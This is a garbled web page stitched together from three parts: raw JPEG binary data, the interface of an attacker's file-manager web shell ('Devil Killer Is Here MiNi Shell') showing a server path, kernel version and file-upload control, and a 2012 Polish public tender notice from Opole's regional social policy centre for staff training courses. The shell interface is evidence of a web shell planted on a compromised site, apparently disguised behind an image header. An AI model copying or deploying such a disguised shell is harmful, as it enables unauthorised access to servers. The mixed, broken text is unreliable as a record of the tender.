JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120523/114657-N-2012.html

<p class="kh_header"><b>Opole: Organizacja i przeprowadzenie szkoleń realizowanych w ramach projektu systemowego Regionalnego Ośrodka Polityki Społecznej w Opolu Poddziałanie 7.1.3 Program Operacyjny Kapitał Ludzki pt. Podnoszenie kwalifikacji kadry  pomocy i integracji społecznej w  województwie opolskim, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Poddziałanie 7.1.3, Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 114657 - 2012; data zamieszczenia: 23.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej w Opolu , ul. Głogowska 25C, 45-315 Opole, woj. opolskie, tel. 077 44 152 50, faks 077 44 152 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rops-opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń realizowanych w ramach projektu systemowego Regionalnego Ośrodka Polityki Społecznej w Opolu Poddziałanie 7.1.3 Program Operacyjny Kapitał Ludzki pt. Podnoszenie kwalifikacji kadry  pomocy i integracji społecznej w  województwie opolskim, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Poddziałanie 7.1.3, Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkoleń realizowanych w ramach projektu systemowego Regionalnego Ośrodka Polityki Społecznej w Opolu Poddziałanie 7.1.3 Program Operacyjny Kapitał Ludzki pt. Podnoszenie kwalifikacji kadry  pomocy i integracji społecznej w  województwie opolskim, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Poddziałanie 7.1.3, Programu Operacyjnego Kapitał Ludzki.
Zamawiający dopuszcza składanie ofert na następujące 4 części:
Część nr 1 - cykle szkoleniowe specjalistyczne

Przedmiotem zamówienia jest organizacja i przeprowadzenie trzech cykli szkoleniowych specjalistycznych realizowanych w ramach projektu systemowego Regionalnego Ośrodka Polityki Społecznej w Opolu Poddziałanie 7.1.3 PO KL pt. Podnoszenie kwalifikacji kadry  pomocy i integracji społecznej w  województwie opolskim, zgodnie z zestawieniem:
1)    cykl pn. Praca z osobą niepełnosprawną -  1 grupa- maks.15 osób w grupie, 
2)    cykl pn. Opieka nad osoba starszą i niepełnosprawną z elementami fizjoterapii -  1 grupa- maks.15 osób w grupie,
3)   cykl pn. Zatrudnienie wspierane z elementami job-coachingu - 1 grupa  - maks.16 osób w grupie.
Szczegółowy przedmiot zamówienia znajduje się w osobnym załączniku do SIWZ pod nazwą  Przedmiot zamówienia -  część nr 1.  Ww. załącznik do SIWZ stanowi jej integralną część. 
Ww. załącznik zawiera: opis przedmiotu zamówienia, czas trwania i formę przeprowadzenia cykli, zakresy oraz metody prowadzenia cykli szkoleniowych specjalistycznych,  a także obowiązki Wykonawcy, standardy zakwaterowania, standardy wyżywienia, standardy sal wykładowo  - szkoleniowych, terminy i miejsce przeprowadzenia cykli, jak również pozostałe informacje dotyczące przedmiotu zamówienia, uczestników, rekrutacji oraz materiałów szkoleniowych.

Część nr 2 - asystent rodziny  

Przedmiotem zamówienia jest organizacja i przeprowadzenie min. 230 godzinnego szkolenia dla maks. 12 osób pn. Asystent rodziny, realizowanego 
w ramach projektu systemowego Regionalnego Ośrodka Polityki Społecznej w Opolu Poddziałanie 7.1.3 PO KL pt. Podnoszenie kwalifikacji kadry  pomocy i integracji społecznej w  województwie opolskim, zgodnie z Rozporządzeniem Ministra Pracy 
i Polityki Społecznej z dnia 9 grudnia 2011 r. w sprawie szkoleń na asystenta rodziny (Dz. U. nr 272, poz. 1608).

Szczegółowy przedmiot zamówienia znajduje się w osobnym załączniku do SIWZ pod nazwą  Przedmiot zamówienia -  część nr 2.  Ww. załącznik do SIWZ stanowi jej integralną część. 
Ww. załącznik zawiera: opis przedmiotu zamówienia, czas i formę trwania szkolenia, zakres oraz metody prowadzenia szkolenia, a także obowiązki Wykonawcy, standardy zakwaterowania, standardy wyżywienia, standardy sal wykładowo  - szkoleniowych, terminy i miejsce przeprowadzenia szkolenia, jak również pozostałe informacje dotyczące przedmiotu zamówienia, uczestników, rekrutacji oraz materiałów szkoleniowych.

Część nr 3 - język migowy

Przedmiotem zamówienia jest organizacja i przeprowadzenie cyklu szkoleniowego 
z zakresu języka migowego, poziom podstawowy - realizowanego w ramach projektu systemowego Regionalnego Ośrodka Polityki Społecznej w Opolu Poddziałanie 7.1.3 PO KL pt. Podnoszenie kwalifikacji kadry  pomocy i integracji społecznej w  województwie opolskim, obejmującego 2 grupy (maks. 30 osób) - maks.15 osób w grupie.
Szczegółowy przedmiot zamówienia znajduje się w osobnym załączniku do SIWZ pod nazwą  Przedmiot zamówienia -  część nr 3.  Ww. załącznik do SIWZ stanowi jej integralną część. 
Ww. załącznik zawiera: opis przedmiotu zamówienia, czas trwania i formę przeprowadzenia, zakres oraz metody prowadzenia cyklu szkoleniowego,  a także obowiązki Wykonawcy, standardy zakwaterowania, standardy wyżywienia, standardy sal wykładowo  - szkoleniowych, terminy i miejsce przeprowadzenia cyklu, jak również pozostałe informacje dotyczące przedmiotu zamówienia, uczestników, rekrutacji oraz materiałów szkoleniowych.

Część nr 4 - Szkolenia specjalistyczne 

Przedmiotem zamówienia jest organizacja i przeprowadzenie 18 szkoleń specjalistycznych realizowanych w ramach projektu systemowego Regionalnego Ośrodka Polityki Społecznej w Opolu Poddziałanie 7.1.3 PO KL pt. Podnoszenie kwalifikacji kadry  pomocy i integracji społecznej w  województwie opolskim, zgodnie z zestawieniem:
a)	 szkolenie pn. Superwizja dla pracowników socjalnych, współpraca z rodzinami zastępczymi -  1 grupa - maks. 15 osób , 
b)	szkolenie pn. Zastosowanie arteterapii w pracy z podopiecznymi DPS/ŚDS - 1 grupa - maks. 15 osób , 
c)	szkolenie pn. Komunikacja z osobą zaburzoną psychicznie i jego rodziną - 2 grupy - maks. 40 osób (maks. 20 osób w grupie),
d)	szkolenie pn. Muzykoterapia - sposoby wykorzystania muzyki w pracy z osobami niepełnosprawnymi - 1 grupa - maks.15 osób,
e)	szkolenie pn. Pogotowie rodzinne - praca ze stresem traumatycznym odseparowanego dziecka - 1 grupa- maks. 15 osób ,
f)	szkolenie pn. Praca z trudnym klientem - 2 grupy - maks. 28 osób (maks. 14 osób w grupie),
g)	szkolenie pn. Zatrudnienie wspierane i kontrakty socjalne - wyzwanie dla wspólnych działań urzędów pracy i OPS - 2 grupy - maks. 32 osoby (maks. 16 osób w grupie).
h)	szkolenie pn. Organizator rodzinnej pieczy zastępczej - ustawa o wspieraniu rodziny  i systemie pieczy zastępczej - dla pracowników PCPR - 1 grupa  -  maks. 15 osób, 
i)	 szkolenie pn. Zmiany w systemie pomocy dziecku i rodzinie - nowa ustawa                o wspieraniu rodziny  i pieczy zastępczej - dla pracowników OPS -  2 grupy - maks.30 osób (maks. 15 osób w grupie),
j)	szkolenie pn. Kodeks Postępowania  Administracyjnego w praktyce jednostek pomocy społecznej z uwzględnieniem nowelizacji -2 grupy - maks. 40 osób (maks. 20 osób w grupie),
k)	szkolenie pn. Świadczenia rodzinne i fundusz alimentacyjny po zmianach. -  1 grupa   -  maks. 20 osób w grupie, 
l)	szkolenie pn. Świadczenia rodzinne w ramach koordynacji systemów zabezpieczenia społecznego - 1 grupa - maks. 20 osób,
m)	szkolenie pn. Zmiany w procedurze Niebieskiej Karty - 2 grupy- maks. 30 osób (maks. 15 osób w grupie),
n)	szkolenie pn. Budżet zadaniowy - 1 grupa - maks. 15 osób,
o)	szkolenie pn. Mobbing, molestowanie i dyskryminacja w miejscu pracy, 
w tym ze względu na płeć -  2 grupy- maks. 30 osób (maks. 15 osób w grupie),
p)	szkolenie pn. Mobbing, molestowanie  i dyskryminacja w miejscu pracy, 
a inne zjawiska przemocy i konfliktu -2 grupy maks. 27 osób (1 grupa - maks. 12 osób , 2 grupa-  maks. 15 osób),
q)	szkolenie pn. Trening głosu. Jak mówić, aby Cię słuchali? - 2 grupy -  maks. 30 osób ( maks. 15 osób w  grupie),
r)	szkolenie pn. Zarządzanie konfliktem i trudne sytuacje w zespole - 1 grupa - maks. 15 osób.

Szczegółowy przedmiot zamówienia znajduje się w osobnym załączniku do SIWZ pod nazwą  Przedmiot zamówienia -  część nr 4.  Ww. załącznik do SIWZ stanowi jej integralną część. 
Ww. załącznik zawiera: opis przedmiotu zamówienia, czas trwania i formę przeprowadzenia szkoleń, zakres oraz metody prowadzenia szkoleń,  a także obowiązki Wykonawcy, standardy zakwaterowania, standardy wyżywienia, standardy sal wykładowo  - szkoleniowych, terminy i miejsce przeprowadzenia szkoleń, jak również pozostałe informacje dotyczące przedmiotu zamówienia, uczestników, rekrutacji oraz materiałów szkoleniowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.51.00.00-2, 80.52.10.00-2, 55.30.00.00-3, 55.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>OPIS SPEŁNIENIA WARUNKU: w zakresie ww. warunku wykonawca zobowiązany jest do złożenia Oświadczenia o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy oraz: 

Dotyczy wyłącznie części nr 2 - asystent rodziny.

Zamawiający wymaga posiadania przez Wykonawcę programu szkolenia zatwierdzonego decyzją ministra właściwego ds. rodziny (art. 12 ust. 4 i 6 ustawy  z dnia 9 czerwca 2011 r. o wspieraniu rodziny i systemie pieczy zastępczej  
(Dz. U. z 2011 nr 149 poz. 887 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>OPIS SPEŁNIENIA WARUNKU: w zakresie ww. warunku wykonawca zobowiązany jest do złożenia Oświadczenia o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy oraz: 

W zakresie części 1  :

Zamawiający wymaga wykonania co najmniej dwóch usług polegających na zorganizowaniu i przeprowadzeniu cykli szkoleniowych z obszaru pomocy społecznej, z których każdy obejmował nie mniej niż 32 godz. lekcyjne wraz z obsługą administracyjną, noclegami, wyżywieniem i zapewnieniem sal szkoleniowych w okresie ostatnich trzech lat przed upływem terminu składania ofert (  ), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie o wartości co najmniej 15.000,00 zł brutto każda wraz z dokumentami (np. referencje, protokoły odbioru) potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie.


W zakresie części 2  :

Zamawiający wymaga wykonania co najmniej jednej usługi polegającej  na zorganizowaniu i przeprowadzeniu cyklu szkoleniowego z zakresu asystentury rodziny lub pracy z rodziną, obejmującego nie mniej niż 40 godzin lekcyjnych wraz z obsługą administracyjną, wyżywieniem i zapewnieniem sal szkoleniowych w okresie ostatnich trzech lat przed upływem terminu składania ofert (  ), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie o wartości co najmniej 20.000,00 zł brutto wraz z dokumentami (np. referencje, protokoły odbioru) potwierdzającymi, że usługa ta została wykonana lub jest wykonywana należycie.


W zakresie części 3:
Zamawiający wymaga wykonania co najmniej dwóch usług polegających na zorganizowaniu i przeprowadzeniu szkolenia/kursu z zakresu języka migowego poziom podstawowy lub/i zawansowany wraz z obsługą administracyjną, noclegami, wyżywieniem i zapewnieniem sal szkoleniowych w okresie ostatnich trzech lat przed upływem terminu składania ofert (  ), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie o wartości co najmniej 20.000,00 zł brutto każda wraz z dokumentami (np. referencje, protokoły odbioru) potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie.

W zakresie części 4:

Zamawiający wymaga wykonania co najmniej trzech usług polegających na zorganizowaniu i przeprowadzeniu szkoleń z obszaru pomocy społecznej lub/i obszarów powiązanych, których odbiorcami była kadry pomocy i integracji społecznej wraz z obsługą administracyjną, noclegami, wyżywieniem i zapewnieniem sal szkoleniowych w okresie ostatnich trzech lat przed upływem terminu składania ofert (   ), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie o wartości co najmniej 50.000,00 zł brutto każda wraz z dokumentami (np. referencje, protokoły odbioru) potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie oprócz Oświadczenia o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy, na podstawie, którego przeprowadzi ocenę spełnienia warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>WARUNEK: W zakresie dysponowania osobami zdolnymi do wykonania zamówienia:  

OPIS SPEŁNIENIA WARUNKU: w zakresie ww. warunku wykonawca zobowiązany jest do złożenia Oświadczenia o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy oraz: 

OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIENIA TEGO WARUNKU: odnośnie posiadania konkretnych kwalifikacji zawodowych w zakresie przedmiotu zamówienia.

Dotyczy wyłącznie części 3 - język migowy - Zamawiający wymaga, aby osoby prowadzące szkolenie z zakresu języka migowego posiadały certyfikat edukatora języka migowego.

OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIENIA TEGO WARUNKU: odnośnie wykształcenia w zakresie przedmiotu zamówienia - Zamawiający wymaga wykazania się osobami i podmiotami, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich wykształcenia. 
 
Dla wszystkich części wymagane jest wykształcenie wyższe osób prowadzących szkolenia 

oraz dodatkowo:

W zakresie części nr 2 - asystent rodziny Zamawiający wymaga, aby osoby prowadzące szkolenie posiadały wykształcenie kierunkowe zgodne z określonym w Rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 9 grudnia 2011 r. w sprawie szkoleń na asystenta rodziny (Dz. U. nr 272, poz. 1608).

OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIENIA TEGO WARUNKU: odnośnie doświadczenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (wymienionych w przedmiocie zamówienia):

Dotyczy części 1:
Zamawiający wymaga wykazania się:
- min. 2 osobami (trenerami) do każdego cyklu, posiadającymi doświadczenie 
w prowadzeniu szkoleń w postaci przeprowadzonych co najmniej 5 szkoleń, odpowiadających swoim rodzajem (tematyką) wymienionemu w przedmiocie zamówienia cyklowi szkoleniowemu,  
- min. 1 osobą, które będzie zajmowała się obsługą administracyjną szkoleń, posiadającą co najmniej 2 - letnie doświadczenie w tym zakresie,
- min. 1 osobą, która posiada min. 3-letnie doświadczenie w zakresie kompleksowej organizacji szkoleń.


Dotyczy części 2:

Zamawiający wymaga wykazania się:
- osobami (trenerami), które będą prowadziły szkolenie, posiadającymi doświadczenie zgodne z Rozporządzeniem  Ministra Pracy i Polityki Społecznej z dnia 9 grudnia 2011 r. w sprawie szkoleń na asystenta rodziny (Dz. U. nr 272, poz. 1608)
- min. 1 osobą, która będzie zajmowała się obsługą administracyjną szkolenia, posiadającą co najmniej 2 - letnie doświadczenie w tym zakresie,
- min. 1 osobą, która posiada min. 3-letnie doświadczenie w zakresie kompleksowej organizacji szkoleń.

Dotyczy części 3:
Zamawiający wymaga wykazania się:
- min. 1 osobą (trenerem), posiadającym min. 2 - letnie doświadczenie w prowadzeniu szkoleń z zakresu języka migowego,
- min. 1 osobą, która będzie zajmowała się obsługą administracyjną szkoleń, posiadającą co najmniej 2 - letnie doświadczenie w tym zakresie,
- min. 1 osobą, która posiada min. 3-letnie doświadczenie w zakresie kompleksowej organizacji szkoleń.


Dotyczy części 4:
Zamawiający wymaga wykazania się:
- min. 14 osobami (trenerami), które będą prowadziły szkolenia, posiadającymi doświadczenie w prowadzeniu szkoleń w postaci przeprowadzonych co najmniej 
5 szkoleń, odpowiadających swoim rodzajem (tematyką szkolenia) szkoleniu objętemu niniejszą częścią zamówienia,
- min. 2 osobami, które będą zajmowały się obsługą administracyjną szkoleń, posiadającymi co najmniej 2 - letnie doświadczenie w tym zakresie,
- min. 1 osobą, która posiada min. 3-letnie doświadczenie w zakresie kompleksowej organizacji szkoleń.

OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIENIA TEGO WARUNKU C.D.: W zakresie ww. warunku wykonawca poza wykazem osób zobowiązany jest do złożenia Oświadczenia o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie oprócz Oświadczenia o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy, na podstawie, którego przeprowadzi ocenę spełnienia warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">program szkolenia zatwierdzony decyzją ministra właściwego ds. rodziny (art. 12 ust. 4  ustawy z dnia 9 czerwca 2011 r. o wspieraniu rodziny i systemie pieczy zastępczej  (Dz. U. z 2011 nr 149 poz. 887 ze zm.)
oraz decyzja ministra właściwego ds. rodziny (art. 12 ust. 6 ustawy  z dnia 9 czerwca 2011 r. o wspieraniu rodziny i systemie pieczy zastępczej  (Dz. U. z 2011 nr 149 poz. 887 z późn. zm.) - dotyczące potwierdzenia posiadania uprawnień (art. 22 ust. 1 pkt 1) ustawy Pzp)  dla części nr 2 - asystent rodziny;</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
